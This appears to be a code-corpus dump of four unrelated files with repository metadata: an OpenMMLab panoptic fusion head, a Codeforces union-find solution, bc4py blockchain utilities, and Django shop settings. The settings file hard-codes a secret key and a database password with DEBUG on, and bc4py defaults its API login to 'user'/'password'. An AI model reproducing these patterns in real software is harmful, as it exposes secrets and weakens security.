# Copyright (c) OpenMMLab. All rights reserved. import torch from mmdet.core.evaluation.panoptic_utils import INSTANCE_OFFSET from mmdet.models.builder import HEADS from .base_panoptic_fusion_head import BasePanopticFusionHead @HEADS.register_module() class HeuristicFusionHead(BasePanopticFusionHead): """Fusion Head with Heuristic method.""" def __init__(self, num_things_classes=80, num_stuff_classes=53, test_cfg=None, init_cfg=None, **kwargs): super(HeuristicFusionHead, self).__init__(num_things_classes, num_stuff_classes, test_cfg, None, init_cfg, **kwargs) def forward_train(self, gt_masks=None, gt_semantic_seg=None, **kwargs): """HeuristicFusionHead has no training loss.""" return dict() def _lay_masks(self, bboxes, labels, masks, overlap_thr=0.5): """Lay instance masks to a result map. Args: bboxes: The bboxes results, (K, 4). labels: The labels of bboxes, (K, ). masks: The instance masks, (K, H, W). overlap_thr: Threshold to determine whether two masks overlap. default: 0.5. Returns: Tensor: The result map, (H, W). """ num_insts = bboxes.shape[0] id_map = torch.zeros( masks.shape[-2:], device=bboxes.device, dtype=torch.long) if num_insts == 0: return id_map, labels scores, bboxes = bboxes[:, -1], bboxes[:, :4] # Sort by score to use heuristic fusion order = torch.argsort(-scores) bboxes = bboxes[order] labels = labels[order] segm_masks = masks[order] instance_id = 1 left_labels = [] for idx in range(bboxes.shape[0]): _cls = labels[idx] _mask = segm_masks[idx] instance_id_map = torch.ones_like( _mask, dtype=torch.long) * instance_id area = _mask.sum() if area == 0: continue pasted = id_map > 0 intersect = (_mask * pasted).sum() if (intersect / (area + 1e-5)) > overlap_thr: continue _part = _mask * (~pasted) id_map = torch.where(_part, instance_id_map, id_map) left_labels.append(_cls) instance_id += 1 if len(left_labels) > 0: instance_labels = torch.stack(left_labels) else: instance_labels = bboxes.new_zeros((0, ), dtype=torch.long) assert instance_id == (len(instance_labels) + 1) return id_map, instance_labels def simple_test(self, det_bboxes, det_labels, mask_preds, seg_preds, **kwargs): """Fuse the results of instance and semantic segmentations. Args: det_bboxes: The bboxes results, (K, 4). det_labels: The labels of bboxes, (K,). mask_preds: The masks results, (K, H, W). seg_preds: The semantic segmentation results, (K, num_stuff + 1, H, W). Returns: Tensor : The panoptic segmentation result, (H, W). """ mask_preds = mask_preds >= self.test_cfg.mask_thr_binary id_map, labels = self._lay_masks(det_bboxes, det_labels, mask_preds, self.test_cfg.mask_overlap) seg_results = seg_preds.argmax(dim=0) seg_results = seg_results + self.num_things_classes pan_results = seg_results instance_id = 1 for idx in range(det_labels.shape[0]): _mask = id_map == (idx + 1) if _mask.sum() == 0: continue _cls = labels[idx] # simply trust detection segment_id = _cls + instance_id * INSTANCE_OFFSET pan_results[_mask] = segment_id instance_id += 1 ids, counts = torch.unique( pan_results % INSTANCE_OFFSET, return_counts=True) stuff_ids = ids[ids >= self.num_things_classes] stuff_counts = counts[ids >= self.num_things_classes] ignore_stuff_ids = stuff_ids[ stuff_counts < self.test_cfg.stuff_area_limit] assert pan_results.ndim == 2 pan_results[(pan_results.unsqueeze(2) == ignore_stuff_ids.reshape( 1, 1, -1)).any(dim=2)] = self.num_classes return pan_results
bded7a0abc4bf1dc4955561f7e0715bcba19006f
7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3
/codeforces/cf326-350/cf334/b.py
3d79209e1a77d7ad5f7c126cf1c70b802e0ece89
[]
no_license
roiti46/Contest
c0c35478cd80f675965d10b1a371e44084f9b6ee
c4b850d76796c5388d2e0d2234f90dc8acfaadfa
refs/heads/master
2021-01-17T13:23:30.551754
2017-12-10T13:06:42
2017-12-10T13:06:42
27,001,893
0
0
null
null
null
null
UTF-8
Python
false
false
1,258
py
# -*- coding: utf-8 -*- import sys,copy,math,heapq,itertools as it,fractions,re,bisect,collections as coll mod = 10**9 + 7 class UnionFind: def __init__(self, size): self.rank = [0] * size self.par = range(size) self.g_num = size def find(self, x): if x == self.par[x]: return x self.par[x] = self.find(self.par[x]) return self.par[x] def same(self, x, y): return self.find(x) == self.find(y) def unite(self, x, y): x, y = self.find(x), self.find(y) if x == y: return self.g_num -= 1 if (self.rank[x] > self.rank[y]): self.par[y] = x else: self.par[x] = y if (self.rank[x] == self.rank[y]): self.rank[y] += 1 def group_num(self): return self.g_num #prime = [1] * 1000005 #prime[0] = prime[1] = 0 #for i in xrange(int(1000005**0.5) + 1): # if prime[i]: # prime[2*i::i] = [0] * len(prime[2*i::i]) p, k = map(int, raw_input().split()) if k == 0: print pow(p, p - 1, mod) exit() uf = UnionFind(p) cnt = 0 for x in xrange(p): if x == k*x % p: if k > 1: cnt += 1 else: uf.unite(x, k*x % p) ans = pow(p, uf.group_num() - cnt, mod) print ans
d2e145a737723d90d40cb49ba1513f4ce09da229
d0fcc2198f1caf5633c4fc0d004ba68714396f1b
/bc4py/utils.py
d1c4a85cb4d9f0df6c85fb081bee3a4001b51119
[ "MIT" ]
permissive
webclinic017/bc4py
4bfce04b666c2aaadda4b7ecc2a8270839231850
620b7d855ec957b3e2b4021cf8069d9dd128587a
refs/heads/master
2022-12-09T22:23:49.842255
2019-06-21T14:24:17
2019-06-21T14:24:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,100
py
from bc4py.config import C, V from bc4py.gittool import get_current_branch from bc4py.chain.utils import GompertzCurve from Cryptodome.Cipher import AES from Cryptodome import Random from Cryptodome.Hash import SHA256 from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter from logging import getLogger, DEBUG, INFO, WARNING, ERROR import multiprocessing import os import psutil import sys WALLET_VERSION = 0 log = getLogger('bc4py') NAME2LEVEL = { 'DEBUG': DEBUG, 'INFO': INFO, 'WARNING': WARNING, 'ERROR': ERROR, } def set_database_path(sub_dir=None): V.DB_HOME_DIR = os.path.join(os.path.expanduser("~"), 'blockchain-py') if not os.path.exists(V.DB_HOME_DIR): os.makedirs(V.DB_HOME_DIR) if sub_dir: V.DB_HOME_DIR = os.path.join(V.DB_HOME_DIR, sub_dir) if not os.path.exists(V.DB_HOME_DIR): os.makedirs(V.DB_HOME_DIR) V.DB_ACCOUNT_PATH = os.path.join(V.DB_HOME_DIR, 'wallet.ver{}.dat'.format(WALLET_VERSION)) def set_blockchain_params(genesis_block, params): assert 'spawn' in multiprocessing.get_all_start_methods(), 'Not found spawn method' V.GENESIS_BLOCK = genesis_block V.GENESIS_PARAMS = params V.BECH32_HRP = params.get('hrp') V.BLOCK_GENESIS_TIME = params.get('genesis_time') V.BLOCK_MINING_SUPPLY = params.get('mining_supply') V.BLOCK_TIME_SPAN = params.get('block_span') V.BLOCK_REWARD = params.get('block_reward') V.COIN_DIGIT = params.get('digit_number') V.COIN_MINIMUM_PRICE = params.get('minimum_price') V.BLOCK_CONSENSUSES = params.get('consensus') GompertzCurve.k = V.BLOCK_MINING_SUPPLY V.BRANCH_NAME = get_current_branch() def check_already_started(): assert V.DB_HOME_DIR is not None # check already started pid_path = os.path.join(V.DB_HOME_DIR, 'pid.lock') if os.path.exists(pid_path): with open(pid_path, mode='r') as fp: pid = int(fp.read()) if psutil.pid_exists(pid): raise RuntimeError('Already running blockchain-py pid={}'.format(pid)) new_pid = os.getpid() with open(pid_path, mode='w') as fp: fp.write(str(new_pid)) log.info("create new process lock file pid={}".format(new_pid)) def console_args_parser(): """get help by `python publicnode.py -h`""" p = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter) p.add_argument('--p2p', help='p2p server bind port', default=2000, type=int) p.add_argument('--rest', help='REST API bind port', default=3000, type=int) p.add_argument('--host', help='REST API bind host', default='127.0.0.1', type=str) p.add_argument('--user', '-u', help='API user name', default='user', type=str) p.add_argument('--password', '-p', help='API password', default='password', type=str) p.add_argument('--sub-dir', help='setup blockchain folder path', default=None) p.add_argument('--log-level', help='logging level', choices=list(NAME2LEVEL), default='INFO') p.add_argument('--log-path', help='recode log file path', default=None, type=str) p.add_argument('--remove-log', help='remove old log file when start program', action='store_true') p.add_argument('--daemon', help='make process daemon', action='store_true') p.add_argument('--staking', help='enable coin base staking', action='store_true') p.add_argument('--solo-mining', help='solo mining for debug or testnet', action='store_true') return p.parse_args() def check_process_status(f_daemon): if sys.platform == 'win32': # windows if f_daemon: if sys.executable.endswith("pythonw.exe"): sys.stdout = open(os.devnull, "w") sys.stderr = open(os.devnull, "w") else: print("ERROR: Please execute by `pythonw.exe` not `python.exe` if you enable daemon flag") sys.exit() else: if sys.executable.endswith("pythonw.exe"): print("ERROR: Please execute by `python.exe`") sys.exit() else: # stdin close to prevent lock on console sys.stdin.close() else: # other if f_daemon: pid = os.fork() if pid == 0: # child process (daemon) sys.stdout = open(os.devnull, "w") sys.stderr = open(os.devnull, "w") else: # main process print("INFO: Make daemon process pid={}".format(pid)) sys.exit() else: # stdin close to prevent lock on console sys.stdin.close() class AESCipher: @staticmethod def create_key(): return os.urandom(AES.block_size) @staticmethod def encrypt(key, raw): assert isinstance(key, bytes) assert isinstance(raw, bytes), "input data is bytes" key = SHA256.new(key).digest()[:AES.block_size] raw = AESCipher._pad(raw) iv = Random.new().read(AES.block_size) cipher = AES.new(key, AES.MODE_CBC, iv) return iv + cipher.encrypt(raw) @staticmethod def decrypt(key, enc): assert isinstance(key, bytes) assert isinstance(enc, bytes), 'Encrypt data is bytes' key = SHA256.new(key).digest()[:AES.block_size] iv = enc[:AES.block_size] cipher = AES.new(key, AES.MODE_CBC, iv) raw = AESCipher._unpad(cipher.decrypt(enc[AES.block_size:])) if len(raw) == 0: raise ValueError("AES decryption error, not correct key") else: return raw @staticmethod def _pad(s): pad = AES.block_size - len(s) % AES.block_size add = AES.block_size - len(s) % AES.block_size return s + add * pad.to_bytes(1, 'little') @staticmethod def _unpad(s): return s[:-ord(s[len(s) - 1:])] class ProgressBar: """ terminal progressbar original: https://github.com/bozoh/console_progressbar author: Carlos Alexandre S. da Fonseca """ def __init__(self, prefix, default_suffix='', total=100, decimals=0, length=50, fill='X', zfill='-'): self.prefix = prefix self.default_suffix = default_suffix self.__decimals = decimals self.__length = length self.__fill = fill self.__zfill = zfill self.__total = total def _generate_bar(self, iteration, suffix=None): percent = ("{0:." + str(self.__decimals) + "f}") percent = percent.format(100 * (iteration / float(self.__total))) filled_length = int(self.__length * iteration // self.__total) bar = self.__fill * filled_length + self.__zfill * (self.__length - filled_length) return '{0} |{1}| {2}% {3}'.format(self.prefix, bar, percent, suffix or self.default_suffix) def print_progress_bar(self, iteration, suffix=None): print('\r%s' % (self._generate_bar(iteration, suffix)), end='') sys.stdout.flush() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): if exc_type is None: self.print_progress_bar(self.__total, 'Complete') print() else: print() sys.stdout.flush() log.error('Error on progress, {}'.format(exc_val)) return True __all__ = [ "set_database_path", "set_blockchain_params", "check_already_started", "console_args_parser", "check_process_status", "AESCipher", "ProgressBar", ]
668657bcff004b73d7f1774f4f953091a5bf649f
3f55607c033fef615f8d0f9ef8d284f43d1709a1
/shop/shop/settings.py
04d5a80fe47afc58d6e082ce02f49aedb74d8b9d
[]
no_license
aakashres/shoppingcart
d37f7425f8585ac0463153a90ae4f1d2ed49c460
2060fac698130b78860072f5fcc0532ec716d087
refs/heads/master
2022-11-09T15:55:27.061262
2017-04-04T15:00:08
2017-04-04T15:00:08
273,651,566
0
0
null
null
null
null
UTF-8
Python
false
false
3,505
py
""" Django settings for shop project. Generated by 'django-admin startproject' using Django 1.10.5. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_bai2f0i6@h=+dy+x1b(&i5$83kg0+g(rq6s5djrt=g+uunlvc' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'account', 'cart', 'messaging', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'shop.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates'), ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'shop.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'shop', 'USER': 'prixa', 'PASSWORD': 'prixatech', 'HOST': 'localhost', 'PORT': '', } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Kathmandu' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = [ os.path.join(BASE_DIR, 'static'), ] STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "root", "static_cdn") MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "root", "media_cdn")